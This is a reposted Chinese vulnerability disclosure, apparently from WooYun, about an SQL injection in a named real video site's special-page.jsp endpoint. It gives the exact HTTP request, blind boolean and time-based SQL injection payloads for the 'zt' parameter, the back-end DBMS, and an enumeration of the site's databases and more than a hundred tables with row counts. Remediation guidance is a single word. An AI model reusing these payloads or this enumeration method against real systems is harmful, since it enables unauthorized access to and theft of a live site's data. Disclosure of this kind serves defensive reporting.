记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

激动网主站存在SQL注射漏洞

2015-08-09 13:45

code 区域
POST /special-page.jsp?zt=1 HTTP/1.1

Content-Length: 24

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://www.joy.cn/

Cookie: JSESSIONID=02DB3555D41D5B8EF0C67471ABD70DB5

Host: www.joy.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Accept: */*



pageNum=1&saction=search

漏洞证明:

code 区域
---

Parameter: zt (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause

Payload: zt=-2879' OR 2165=2165 AND 'AUrp'='AUrp



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: zt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))soje) AND 'KTia'='KTia

---

web application technology: JSP

back-end DBMS: MySQL 5.0.12

available databases [4]:

[*] information_schema

[*] test

[*] wapcms

[*] waptranscode



Database: wapcms

+-----------------------------------+---------+

| Table | Entries |

+-----------------------------------+---------+

| reader_statistics_data | 12456775 |

| reader_voteresult_data | 10085592 |

| reader_system_log | 5855412 |

| reader_inter_vote_subitem | 2567636 |

| reader_resource_video_suite | 2087161 |

| reader_order_user_house | 1972867 |

| statistics_url_hour_data_report | 1765332 |

| reader_resource_p_res_info | 1004886 |

| statistics_url_data_report | 961519 |

| reader_resource_all | 230662 |

| reader_resource_video | 221989 |

| reader_inter_msgrecord | 192016 |

| reader_resource_restype | 165123 |

| statistics_ip_report | 145163 |

| reader_video_targetfile_status | 90159 |

| reader_statistics_url_config_auth | 75085 |

| reader_video_hot_comment | 53641 |

| reader_bussiness_column | 48737 |

| temp_dxn_type | 37545 |

| temp_dxn_file | 37450 |

| temp_dxn_resource | 31594 |

| reader_resource_material | 29651 |

| wo_push | 28767 |

| reader_inter_msglog | 28073 |

| wo_video | 21750 |

| reader_video_task_targetfile | 18328 |

| reader_ios_token | 17283 |

| reader_system_ipinfo_20111207 | 11836 |

| reader_bussiness_template | 9550 |

| reader_resource_info | 8700 |

| reader_inter_vote_item | 5177 |

| reader_resource_pack_fee | 4339 |

| reader_system_keyword | 3914 |

| reader_video_task_file | 3842 |

| reader_push_message | 2462 |

| temp_dxn_suite | 2298 |

| reader_statistics_url_config | 1989 |

| reader_resource_author | 1772 |

| ugc_user | 1489 |

| reader_comment_user | 1447 |

| rank_third | 1260 |

| reader_inter_vote | 1245 |

| reader_offline_log | 1175 |

| reader_system_ipinfo20110416 | 1069 |

| reader_system_ipinfo20100723 | 890 |

| reader_user_points_record | 770 |

| temp_dxn_suite1 | 766 |

| reader_resource_type | 740 |

| reader_video_task | 657 |

| reader_system_roles_privileges | 596 |

| media | 588 |

| reader_tag_template | 478 |

| statistics_url_config_group_rel | 430 |

| reader_statistics_access_log | 419 |

| reader_adapter_comadapterrule | 400 |

| reader_system_users_groups | 324 |

| reader_tag_userdef | 281 |

| reader_system_ipinfo | 256 |

| reader_adapter_adapterrule | 244 |

| reader_adapter_adapter | 221 |

| video_news | 182 |

| reader_system_users_roles | 139 |

| reader_useragent_ua | 133 |

| reader_system_variables | 117 |

| reader_tag_sys | 117 |

| reader_bussiness_packgroup | 102 |

| reader_useragent_ua_g_u | 102 |

| reader_system_user | 101 |

| reader_system_privilege | 90 |

| reader_system_menu | 79 |

| reader_resource_material_cata | 62 |

| statplaytop | 60 |

| reader_resource_ebook_chapter | 50 |

| reader_activity_join_record | 45 |

| pic_news | 32 |

| reader_ad_info | 26 |

| reader_system_role | 18 |

| reader_bussiness_tem_catalog | 17 |

| reader_activity_videos | 15 |

| reader_useragent_ua_group | 15 |

| statistics_url_config_group | 15 |

| reader_statistics_data_report | 11 |

| reader_system_group | 11 |

| reader_bussiness_tem_default | 10 |

| reader_inter_msgboard | 8 |

| user_info | 8 |

| reader_adapter_type | 7 |

| reader_bussiness_tem_type | 6 |

| reader_actiivty_award_user | 5 |

| reader_statistics_channel | 5 |

| reader_activity | 4 |

| reader_focus_pic | 4 |

| special_mgr | 4 |

| reader_partner_channel_child | 3 |

| reader_resource_ebook_tome | 3 |

| reader_resource_referen | 2 |

| reader_video_transcode_server | 2 |

| reader_bussiness_pg_area | 1 |

| reader_bussiness_product | 1 |

| reader_fee_fee | 1 |

| reader_partner_channel | 1 |

| reader_partner_spcp | 1 |

| reader_system_keyword_type | 1 |

| reader_video_cover | 1 |

| reader_vote_item_custom | 1 |

+-----------------------------------+---------+

修复方案:

修复

知识来源: www.wooyun.org/bugs/wooyun-2015-0122648

阅读:101400 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“激动网主站存在SQL注射漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云